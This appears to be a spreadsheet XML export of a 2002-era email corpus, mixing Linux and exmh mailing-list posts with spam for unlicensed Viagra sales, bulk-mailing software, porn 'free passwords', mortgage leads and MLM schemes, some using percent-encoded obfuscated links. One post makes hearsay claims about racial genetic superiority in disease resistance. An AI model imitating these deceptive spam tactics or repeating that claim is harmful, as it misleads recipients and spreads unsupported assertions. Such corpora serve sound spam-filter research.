 REPLY IMMEDIATELY!
 We look forward to getting your reply...SOON!
 Good luck!
 p.s. REMEMBER TO GIVE US A WAY TO REACH YOU BY PHONE TODAY!
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_49691723P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;
 &gt; Date:  Sun, 28 Jul 2002 16:05:37 -0500
 &gt;
 &gt; I did a commit on friday and I just did an update right now.
 I just did another commit.  It was a minor change I'd been thinking of, so I 
 thought I'd check it in just to test cvs.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_49691723P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9RGFnK9b4h5R0IUIRAllfAJ9BUoCuOA3+kOIMHVBeRU5S7HPg7gCeKv0Z
 j0oRuMgmAL+NMS9sjvoXyVw=
 =OzEq
 -----END PGP SIGNATURE-----
 --==_Exmh_49691723P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: fast ship Viagra, Phentermine, etc...             RIYM
</t>
  </si>
  <si>
    <t xml:space="preserve">We ship worldwide within 24 hours!
 No waiting rooms, drug stores, or embarrassing conversations. 
 Our licensed pharmacists will have your order to you in 1 or 2 days!
 Click this link to get started today!   
 http://www.atlanticmeds.com/main2.php?rx=17692
 VIAGRA and many other prescription drugs available, including: 
 XENICAL and Phentermine, weight loss medications used to help
 overweight people lose weight and keep this weight off. 
 VALTREX, Treatement for Herpes. 
 PROPECIA, the first pill that effectively treats
 male pattern hair loss. 
 http://www.atlanticmeds.com/main2.php?rx=17692
 ZYBAN, Zyban is the first nicotine-free pill that,
 as part of a  comprehensive program from 
 your health care  professional, can help you
 stop smoking. 
 http://www.atlanticmeds.com/main2.php?rx=17692
 CLARITIN, provides effective relief from the  symptoms 
 of seasonal allergies.  And Much More... 
 Cilck this link to get started today!
 http://www.atlanticmeds.com/main2.php?rx=17692
 To Be extracted from future contacts visit:
 http://worldrxco.com/remove.php
 flierguy49_2000
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8613674,159/
 Date: 2002-10-06T18:12:46+01:00
 Back when 64KB was more memory than any computer would ever need, there was a 
 time when memory managers didnt exist. But gradually, new computer systems 
 came out with larger amounts of memory and designers discovered ways to eat up 
 RAM faster than any system could dish it out. This discussion is based on 
 Tiburon's experiences in writing and rewriting the memory manager for Madden 
 NFL 97 to Madden NFL 2002.
</t>
  </si>
  <si>
    <t xml:space="preserve">HI ,  
 As a professional bulk mailer for 5 years. I made over $200,000 last 12 months selling only one product, "The Banned CD".
 Luckily for you, the 'Bulker CD 2003" is now for sale! I decide to sell all secrets how I made over $20,000 per month at home only few hours work.
 Why don't more people use Bulk Email Marketing?
 1. Lack of knowledge. Most people do not know how to set up a marketing campaign let alone set up an effective email marketing campaign. Through hard work and trial and error, we have developed simple yet successful strategies to send your emails. We can show you how to do it properly.
 2. Fear of getting into trouble. Most people do not send email because they have heard negative things about SPAM and that your isp will shut you down. This is true if you don't know what you are doing and bulk email to the masses. If you don't believe in SPAM, we have developed alternative ways to bulk email so that you are sending your emails responsibly without getting into any trouble at all.
 3. Don't have the necessary equipment/softwares. To send your emails out, you need a computer with specialized email software installed that will send or harvest your emails.
 We are the email marketing software experts! The softwares ranging will up to thousands of dollars. Buying the correct software for your needs can be confusing. Depending on your budget, requirements and goals, we can help recommend the best software for you.
 BULKER CD-ROM has everything you need to start bulk Emailing immediately, all on this one CD!  
 BULKER CD-ROM is excellent for the beginner as well as the professional. Advertising my products have never been easier!
 Please Click the URL for the Detail! 
 http://%77%77%77%2E%62a%6E%6E%65%64c%64%2E%6E%65%74/bulk.htm
 You are receiving this special offer because you have provided permission to receive third party email communications regarding special online promotions or offers. We strongly oppose the use of SPAM email and do not want to send our mailings to anyone who does not wish to receive them. If you do not wish to receive any further messages from netcommission. To Be Removed From Our List, http://%77%77%77%2E%62a%6E%6E%65%64c%64%2E%6E%65%74/remove.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Sun Hardware 50% off list price
</t>
  </si>
  <si>
    <t xml:space="preserve">
 This is a multi-part message in MIME format
 --54a5e47a-30cb-4795-82c2-220a03d8450a
 Content-Type: text/plain; charset=windows-1252
 Content-Transfer-Encoding: quoted-printable
 Dear IT Professional,
 SolariseXpert offers Sun Microsystems servers at 35-60% off Sun's list price.
 =
 http://www.solariseXpert.com
 Few examples:
 T3 Arrays unused in original sealed box  $30,000 (Sun list price $55,700) 
 Enterprise E4500 remanufactured $48,000 (Sun list price $124,600)
 Enterprise E3500 unused in original sealed box $27,000 (Sun list price =
 $52,000)
 SunFire 280R  unused in original sealed box  $8,200
 E10K (Enteprise 10000 w/ 20 processors) remanufactured $225,000 (Sun list =
 price $920,210)
 Trade-ins welcome. We will fit your budget for any Sun server, storage array =
 and parts/upgrades.
 We have offices in the US and Europe with partners in the  AsiaPac region.
 Thank you.
 The Team at SolariseXpert
 (877) 44 SOLEX (Toll Free US)
 +001 407 323 1668 International (Si parla Italiano)
 http://www.solariseXpert.com
 NOTICE: SolariseXpert.com is NOT related in any way to Sun Microsystems Inc. 
 =
 We do not engage in trading of e-mail addresses or continous mass-mailing. =
 This is most likely the only message you will ever receive from us. If you =
 are receiving this message by mistake, please reply with "REMOVE" in the =
 subject line to be permanently removed.   
 --54a5e47a-30cb-4795-82c2-220a03d8450a--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Order Viagra Online - Safely &amp; Securely              HNWGYI
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Dietary Supplement&lt;/title&gt;
 &lt;/head&gt;
 &lt;body link=3D"#FFFFFF"  alink=3D"#FFFFFF"    vlink=3D"#FFFFFF"&gt;
 &lt;table width=3D525 cellpadding=3D5 border=3D0&gt;&lt;tr&gt;&lt;td&gt;&lt;p&gt;
 &lt;img src=3D"http://www.hebalist.com/m1.jpg"&gt;&lt;/p&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;table width=3D525 cellpadding=3D5 border=3D0&gt;&lt;tr&gt;
 &lt;td  valign=3Dmiddle&gt;&lt;p&gt;
 &lt;img src=3D"http://www.hebalist.com/m3.jpg"&gt;&lt;br&gt;
 &lt;a href=3D"http://www.hebalist.com?id=3D610"&gt;
 &lt;img src=3D"http://www.hebalist.com/m2.jpg"&gt;&lt;/a&gt;&lt;/p&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;/table&gt;
 &lt;table width=3D525 cellpadding=3D5 border=3D0&gt;&lt;tr&gt;&lt;td&gt;&lt;p&gt;
 &lt;a href=3D"http://www.hebalist.com/service.html"&gt;
 &lt;img src=3D"http://www.hebalist.com/m4.jpg"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Rick Moen &lt;rick@linuxmafia.com&gt; wrote:
 &lt;snip&gt;
 &gt; Don't like SuSE's product licensing?  Write your own distribution.  You
 &gt; can even grab most of what you need _from SuSE_.  All you have to do is 
 &gt; heed the licensing terms on the individual pieces.
 &lt;snip&gt;
 How unimaginably difficult is this to do?
 There are as far as I know, no Linux kernel hackers, nor distros that originate from this fair island right?
 Right.
 Yes it might be very,very difficult and subject to abject failure 
 in sticking together a distro.... call it Dolmen Linux (or other), 
 no doubt the packaging system would be one of the first places
  such a suggestion would stumble.
 Some (like me) favouring a FreeBSD style ports system others favouring
  a Debian style system and others still favouring *rpm style packaging.
 That said other *LUG have done interesting things like making blackbox.
 Perhaps making a distro would be ..... umm.... fun.
 Just a pseudo random thought.
 I'm only laughing on the outside 
 My smile is just skin deep 
 If you could see inside I'm really crying 
 You might join me for a weep.
 &lt;&lt;At your service Madame&gt;&gt;
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [IIU] Eircom aDSL Nat'ing
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi all,
 apologies for the possible silly question (i don't think it is, but), 
 but is Eircom's aDSL service NAT'ed?
 and what implications would that have for VoIP? I know there are 
 difficulties with VoIP or connecting to clients connected to a NAT'ed 
 network from the internet wild (i.e. machines with static, real IPs)
 any help pointers would be helpful,
 cheers
 -- 
 rgrds,
 Bernard
 -- 
 Bernard Tyers * National Centre for Sensor Research * P:353-1-700-5273 *
 E: bernard.tyers@dcu.ie * W: www.physics.dcu.ie/~bty * L:N117
 _______________________________________________
 IIU mailing list
 IIU@iiu.taint.org
 http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [zzzzteana] Re: Archer-UK TV Alert
</t>
  </si>
  <si>
    <t xml:space="preserve">TimH:
 &gt;I was watching that last night and I couldn't help wondering if one 
 &gt;of the GIs was Dexter Fletcher out of the Crystal Maze. 
 Yup, was him out of Press Gang
 &gt;Who once snogged Shauna Lowery, if anyones heard of her. 
 Did you have to kneel down?
 Dave
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Newbie seeks advice - Suse 7.2
</t>
  </si>
  <si>
    <t xml:space="preserve">Folks,
 my first time posting - have a bit of Unix experience, but am new to Linux.
 Just got a new PC at home - Dell box with Windows XP. Added a second hard disk
 for Linux. Partitioned the disk and have installed Suse 7.2 from CD, which went
 fine except it didn't pick up my monitor.
 I have a Dell branded E151FPp 15" LCD flat panel monitor and a nVidia GeForce4
 Ti4200 video card, both of which are probably too new to feature in Suse's default
 set. I downloaded a driver from the nVidia website and installed it using RPM.
 Then I ran Sax2 (as was recommended in some postings I found on the net), but
 it still doesn't feature my video card in the available list. What next?
 Another problem. I have a Dell branded keyboard and if I hit Caps-Lock twice,
 the whole machine crashes (in Linux, not Windows) - even the on/off switch is
 inactive, leaving me to reach for the power cable instead.
 If anyone can help me in any way with these probs., I'd be really grateful -
 I've searched the 'net but have run out of ideas.
 Or should I be going for a different version of Linux such as RedHat? Opinions
 welcome.
 Thanks a lot,
 Peter
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthias Haase wrote:
 &gt; The recompile of the SPRM failed for me with:
 &gt; #----
 &gt; RPM build errors:
 &gt;     File not found by glob:
 &gt; /var/tmp/freetype-2.1.2-root/usr/lib/libttf.so.*
 &gt;     File not found: /var/tmp/freetype-2.1.2-root/usr/lib/libttf.so
 Weird.  I had no problems at all rebuilding from the SRPM with specfile
 modified to enable the bytecode interpreter.  The "check-files" test
 warns that "/usr/share/aclocal/freetype2.m4" was not included in any
 package, but other then that, it's all perfectly clean.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Lucas Gonze:
 &gt;Senders should vary the recipient list to include non-targets, like party 
 &gt;officials, and to exclude targets enough to give them plausible 
 &gt;deniability.
 Which means the sender has a list of who the true
 targets are, and who the fake targets are, and
 scripts for mixing these. On the receiving side,
 my email client distinguishes between messages
 that are read, and messages that are not. I like
 to mark or save messages that are particularly
 interresting or important to me. And even if I
 make a point to delete "suspicious material"
 immediately upon reading it, even THAT might
 leave an interesting kind of trace on my machine.
 Sorry, but I don't buy the argument that spam
 protects people who want to distribute or see
 material the government disapproves.
 _________________________________________________________________
 MSN Photos is the easiest way to share and print your photos: 
 http://photos.msn.com/support/worldwide.aspx
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">  | Date: Fri, 19 Jul 2002 14:28:42 +0100
   | From: Niall O Broin &lt;niall@linux.ie&gt;
   | 
   | I have about 60G of data which I need to copy from one disk
   | to another.  However, I'm not sure how I should best copy it.
   | The problem is the bulk of the data is images and most of these
   | image have two directory entries i.e. there is a hard link to
   | each file.  If I copy them using cp -a or my usual favourite of
   | find .|cpio -pmd other_dir  it's going to copy each file twice,
   | which is not what I want. dump / restore would take care of this
   | if the source filesystem wasn't reiserfs  :-(  Any suggestions ?
  do your (and my) favourite, it'll be Ok:
   1. cpio(1) preserves hard links, i.e., if F1 and F2 are
      hard-linked and both are "copied", then the "copies"
      are also hard-linked.  this is true of all `cpio's
      (and `tar' and any other decent/usable archival tool,
      by definition (IMHO)).
   2. `cpio -p' (at least `GNU cpio version 2.4.2') will only
      read/write (copy) the actual data bytes once.  I _think_
      this is true for all `cpio's (not just that GNU version),
      but am not certain.
  if you use an intermediate archive, e.g.:
     cpio -o ... &gt;file;   ...;   cpio -i ... &lt;file
  then the actual data bytes are copied into the archive (file)
  under each name (e.g., as both F1 and F2).  but GNU `cpio' is
  smart about this in pass-through mode (`-p'), copying the data
  just once (or so I read the source).
 cheers!
 	-blf-
 p.s. assuming this is a one-time operation that you won't repeat
     anytime soon (e.g., never; i.e., time isn't a major issue),
     and are not using any intermediate media/file (so storage
     isn't an issue), then even if `cpio' did read the data twice,
     so what? --- as long as, of course, it re-creates the hard
     links.  which it will.
 --
  Innovative, very experienced, Unix and      | Brian Foster    Dublin, Ireland
  Chorus (embedded RTOS) kernel internals     | e-mail: blf@utvinternet.ie
  expert looking for a new position ...       | mobile: (+353 or 0)86 854 9268
   For a résumé, contact me, or see my website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</si>
  <si>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    Date:        Tue, 06 Aug 2002 09:04:58 +0100
     From:        Marc Baaden &lt;baaden@smplinux.de&gt;
     Message-ID:  &lt;E17bzKv-0000mo-00@frontend2.herald.ox.ac.uk&gt;
   | Any hints ?
 Probably a private sequence has gotten set, the highlighting only
 works for public ones.
 If "scan unseen" works as you'd expect, but highlighting doesn't,
 that's the usual explanation.
 kre
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">͂ĂԂǂ
 ݂Ƃ̃R{[V
 [^rfIicucj
 _x0082_܂ŉcƂł邩킩܂
 ͂߂ɁI
 http://www.transrave.com/PC/rori
 i
 `@Écn9@̓
 ȂǂȂ132iBD]I
 (^-^)/~Fg[
 To Unsubscribe: send mail to majordomo@FreeBSD.org
 with "unsubscribe freebsd-ports" in the body of the message
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Some of the largest membership sites for free
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Free passwords&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
 -1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;div align=3D"center"&gt;&lt;a href=3D"http://www.americanteensluts.com/fpp/rune=
 /rune8.html"&gt;&lt;font size=3D"+3"&gt;GET PORN FOR FREE&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;FREE PASSWORD TO:&lt;br&gt;
 &lt;a href=3D"http://www.americanteensluts.com/fpp/rune/rune8.html"&gt;18 &amp;amp; =
 ASIAN&lt;/a&gt;&lt;br&gt;
 &lt;a href=3D"http://www.americanteensluts.com/fpp/rune/rune8.html"&gt;HUGE TITS=
  XXX&lt;/a&gt;&lt;br&gt;
 &lt;a href=3D"http://www.americanteensluts.com/fpp/rune/rune8.html"&gt;FREE AMAT=
 EUR HOTTIES&lt;/a&gt;&lt;br&gt;
 &lt;a href=3D"http://www.americanteensluts.com/fpp/rune/rune8.html"&gt;FREE TEEN=
  HOTTIES&lt;/a&gt;&lt;br&gt;
 &lt;a href=3D"http://www.americanteensluts.com/fpp/rune/rune8.html"&gt;FREE AND =
 KINKY&lt;/a&gt;&lt;br&gt;
 &lt;a href=3D"http://www.americanteensluts.com/fpp/rune/rune8.html"&gt;FREE FARM=
  SLUTS&lt;/a&gt;&lt;br&gt;
 &lt;a href=3D"http://www.americanteensluts.com/fpp/rune/rune8.html"&gt;FREE n' F=
 AMOUS&lt;/a&gt; 
 &lt;br&gt;
 &lt;br&gt;Adults only&lt;/div&gt;
 &lt;br&gt;&lt;br&gt;
 Diligent
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Interest Rates at Forty Yr. Lows
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN"&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;www.low-interest-rates.net&lt;/title&gt;
 &lt;style&gt;
 &lt;!--
 td {
 	font-family: Verdana, Tahoma, sans-serif;
 	font-size: 12px;
 	color: black;
 }
 text {
 	font-family: Verdana, Tahoma, sans-serif;
 	font-size: 11px;
 	color: black;
 }
 text2 {
 	font-family: Verdana, Tahoma, sans-serif;
 	font-size: 12px;
 	color: black;
 }
 header {
 	font-family: Trebuchet MS, Verdana, Tahoma, sans-serif;
 	font-size: 17px;
 	color: white;
 }
 title {
 	font-family: Trebuchet MS, Verdana, Tahoma, sans-serif;
 	font-size: 20px;
 	color: #D6CFAB;
 	font-weight: bold;
 }
 h4 {
 	color: #B5C943;
 	font-family: Tahoma, sans-serif;
 }
 footer {
 	font-family: Verdana, Tahoma, sans-serif;
 	font-size: 10px;
 	color: white;
 	font-weight: bold;
 }
 a.footer {color: white; text-decoration: none;}
 a.footer:visited {color: white; text-decoration: none;}
 a.footer:hover {color: white; text-decoration: underline;}
 button {
 	font-size: 11px;
 	border-width: 0;
 	background-color: #476f8f;
 	color: white;
 	font-family: Verdana, Tahoma, sans-serif;
 	font-weight: bold;
 }
 #selected {
 	color: #F5989D;
 	text-decoration: none;
 }
 clicker {cursor: hand}
 a {color: white; text-decoration: none;}
 //--&gt;
 &lt;/style&gt;
 &lt;/head&gt;
 &lt;body leftmargin=3D10 topmargin=3D15 marginwidth=3D10 marginheight=3D15&gt;
 &lt;FORM action=3D method=3Dpost&gt;
 &lt;div&gt;
 &lt;table width=3D"100%" cellspacing=3D0 cellpadding=3D0 border=3D0&gt;&lt;tr&gt;&lt;td b=
 gcolor=3D#D6CFAB&gt;
 &lt;center&gt;
 &lt;br&gt;
 &lt;table width=3D540 cellspacing=3D0 cellpadding=3D0 border=3D0&gt;
 &lt;tr&gt;
 &lt;td bgcolor=3D#F5989D height=3D50 class=3Dheader align=3Dleft&gt;&amp;nbsp;&amp;nbsp;=
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;b&gt;quotepool&lt;/b&gt;mortgage&amp;#153;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;&lt;td bgcolor=3Dwhite align=3Dcenter&gt;
 &lt;table width=3D490 cellspacing=3D0 cellpadding=3D0 border=3D0&gt;
 &lt;tr&gt;
 &lt;td align=3Dleft class=3Dtext&gt;
 &lt;br&gt;
 We're different and it's a difference that can save you time and money.&lt;br=
 &gt;
 We &lt;b id=3Dselected&gt;can&lt;/b&gt; help you:&lt;br&gt;&lt;br&gt;
 	&lt;table width=3D490 cellspacing=3D0 cellpadding=3D0 border=3D0&gt;
 	&lt;tr&gt;&lt;td width=3D25 align=3Dcenter class=3Dtitle&gt;&amp;#149;&lt;/td&gt;&lt;td class=3Dte=
 xt2&gt;&lt;b&gt;Refinance&lt;/b&gt; to get a lower rate&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr&gt;&lt;td align=3Dcenter class=3Dtitle&gt;&amp;#149;&lt;/td&gt;&lt;td class=3Dtext2&gt;&lt;b&gt;Cons=
 olidate&lt;/b&gt; your high-interest debt&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr&gt;&lt;td align=3Dcenter class=3Dtitle&gt;&amp;#149;&lt;/td&gt;&lt;td class=3Dtext2&gt;&lt;b&gt;Lowe=
 r&lt;/b&gt; your monthly payments&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr&gt;&lt;td align=3Dcenter class=3Dtitle&gt;&amp;#149;&lt;/td&gt;&lt;td class=3Dtext2&gt;Get &lt;b&gt;=
 extra cash&lt;/b&gt; for a vacation&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr&gt;&lt;td align=3Dcenter class=3Dtitle&gt;&amp;#149;&lt;/td&gt;&lt;td class=3Dtext2&gt;Pay for=
  &lt;b&gt;tuition&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr&gt;&lt;td align=3Dcenter class=3Dtitle&gt;&amp;#149;&lt;/td&gt;&lt;td class=3Dtext2&gt;Start h=
 ome &lt;b&gt;improvements&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr&gt;&lt;td align=3Dcenter class=3Dtitle&gt;&amp;#149;&lt;/td&gt;&lt;td class=3Dtext2&gt;&lt;b&gt;Purc=
 hase&lt;/b&gt; a New Home&lt;/td&gt;&lt;/tr&gt;
 	&lt;/table&gt;
 &lt;br&gt;
 &lt;p class=3Dtext&gt;We understand that there are a lot of decisions to make wh=
 en securing a mortgage loan or refinancing your current loan.  That's why =
 we have mortgage EXPERTS with years of EXPERIENCE to help you make the rig=
 ht decisions.  
 &lt;p class=3Dtext&gt;Credit doesn't have to be an issue either.  Whether your c=
 redit's perfect or less than perfect, we can help you find the best deal o=
 n your home loan. Our quick, FREE, easy form will put you in contact with =
 the top brokers in the business!&lt;br&gt;
 &lt;b&gt;DON'T Miss The Opportunity to SAVE!&lt;/b&gt;
 &lt;p class=3Dtext&gt;Now is the perfect time to secure your mortgage loan.  Wit=
 h our country in a recession, the federal government keeps LOWERING INTERE=
 ST RATES to help stimulate the economy.  It is a win-win situation and it =
 benefits mostly YOU, the homeowner! &lt;b&gt;Try it now!&lt;/b&gt;
 &lt;p class=3Dtext&gt;&lt;b&gt;There are NO excuses. There are great rates available, =
 it's a simple form, and it costs you NOTHING to fill out for a FREE quote.=
 &lt;/b&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;table cellspacing=3D1 cellpadding=3D0 border=3D0 align=3Dright&gt;
 &lt;tr&gt;
 &lt;td bgcolor=3D#F5989D width=3D150 height=3D25 align=3Dcenter&gt;&lt;a href=3D"ht=
 tp://www.low-interest-rates.net/"&gt;&lt;b&gt;PROCEED HERE&lt;/b&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D100&gt;&amp;nbsp;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D540 cellspacing=3D0 cellpadding=3D0 border=3D0&gt;
 &lt;tr&gt;
 &lt;td width=3D484 height=3D30 align=3Dleft bgcolor=3D#F5989D class=3Dfooter&gt;=
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;a href=3D"http://www.low-interest-rates.net/etc/=
 privacy.htm" class=3Dfooter&gt;Privacy&lt;/a&gt; | &lt;a href=3D"http://www.low-intere=
 st-rates.net/etc/unsubscribe.htm" class=3Dfooter&gt;Unsubscribe&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/div&gt;
 &lt;/FORM&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: OOPS!  Please Excuse My mistake!
</t>
  </si>
  <si>
    <t xml:space="preserve">Just sent you a note with the wrong link. Tthe correct one is 
 http://letscreatebiz.com/whjoinfree  
 It is worth a minute of your time to check it out.
 Remember, you have nothing to lose and potentially a lot to gain!
 Best Regards,
 Wayne
 ---------------------------------------------------
 To be removed from future mailings, simply
 respond with REMOVE in the subject line.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On 8/18/02 9:11 PM, "Robert Harley" &lt;harley@argote.ch&gt; wrote:
 &gt; 
 &gt; Another theory is that Europe was a rural backyard until the Renaissance,
 &gt; certainly when compared to big urban centres like Constantinople and Baghdad.
 It is possible; hell if I know.
 &gt; I don't know the genetic studies of which you speak, but I know of one that
 &gt; is sort-of relevant: apparently men of Ashkenazi descent are susceptible
 &gt; to sickle-cell anemia and the probable reason is that the same genetic
 &gt; factor that causes that also protects women from tuberculosis (IIRC), which
 &gt; would have come in handy in central European towns at a time when the Jewish
 &gt; population was a lot more urbanised than average Joes.
 I actually hear about this from people who are researchers in
 pharma-biotech.  My authority isn't much better than "they say", but they
 say that they've uncovered quite a few advantageous mutations in the ethnic
 European genome that protect against quite a few different diseases,
 mutations which are not found in various African, Asian, and other
 populations that they also study.  Based on the genome research (as it
 relates to infectious disease, which is among their primary interests) of
 these various populations around the world, they and others are finding far
 more protective mutations in the Caucasian/European genome than in the other
 race populations they survey.  All the races and ethnic subgroups usually
 have genetic mutations specific to them that provide protection against
 specific infectious diseases.  What they are saying is that they are finding
 far more in the European genome than in the others, and it isn't because
 nobody is looking elsewhere.
 You can find studies and results like this in the science wires.  For
 example, one which I remember off the top of my head is the identified
 genetic mutation that makes something like 1% of Caucasians immune to HIV-1,
 and another 10-20% or so resistant to it.  Obviously, the protective
 mutation occurred at some point in time prior to HIV-1 being introduced into
 the European population.  What the researchers I've talked to seem to be
 saying is that Europeans express a lot more of these types of gene
 mutations, with similar protections from infectious disease, than other
 populations.  Nobody really knows why for sure.  On the upside, identifying
 genetic immunities to infectious disease helps the bio-techs come up with
 pharmacological solutions for people that don't have immunity.
 -James Rogers
  jamesr@best.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: cell phone ring tones 84221111000000
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;table width="350" border="0" cellspacing="0" cellpadding="0" align=center&gt;
         &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt; 
               &lt;font face=verdana size=+2&gt;&lt;b&gt; &lt;center&gt;Take yourself out of our list &lt;a href=http://freesite010.merchantnet.biz/remove.html&gt;&lt;font color=green&gt;BY CLICKING HERE&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/center&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
 &lt;tr&gt; 
           &lt;td bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt; 
             &lt;div align="center"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="4"&gt;&lt;b&gt;&lt;i&gt;&lt;font color="#FF0000" size="6"&gt;BORED 
               WITH &lt;br&gt;
               YOUR CELL PHONE?&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td bgcolor="#FFFFFF" bordercolor="#FFFFFF"&gt; 
             &lt;div align="center"&gt;&lt;b&gt;&lt;font color="#0000FF" face="Arial, Helvetica, sans-serif" size="3"&gt; 
               &lt;/font&gt;&lt;/b&gt;
               &lt;table width="335" border="0" cellspacing="3" cellpadding="0" bgcolor="#0000CC"&gt;
                 &lt;tr&gt; 
                   &lt;td bgcolor="#FFFF00" bordercolor="#FFFFFF"&gt; 
                     &lt;div align="center"&gt;&lt;b&gt;&lt;font color="#0000FF" face="Arial, Helvetica, sans-serif" size="3"&gt; 
                       &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; 
                       &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; 
                       &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149;&lt;br&gt;
                       &lt;/font&gt;&lt;/b&gt;&lt;font color="#0000FF" face="Arial, Helvetica, sans-serif" size="3"&gt;&lt;b&gt;Get 
                       cool Songs &amp;amp; Logos to your Phone today!&lt;/b&gt;&lt;/font&gt;&lt;b&gt;&lt;font color="#0000FF" face="Arial, Helvetica, sans-serif" size="3"&gt;&lt;br&gt;
                       &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; 
                       &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; 
                       &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149; &amp;#149;&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
                   &lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
               &lt;b&gt;&lt;font color="#0000FF" face="Arial, Helvetica, sans-serif" size="3"&gt; 
               &lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
           &lt;/td&gt;
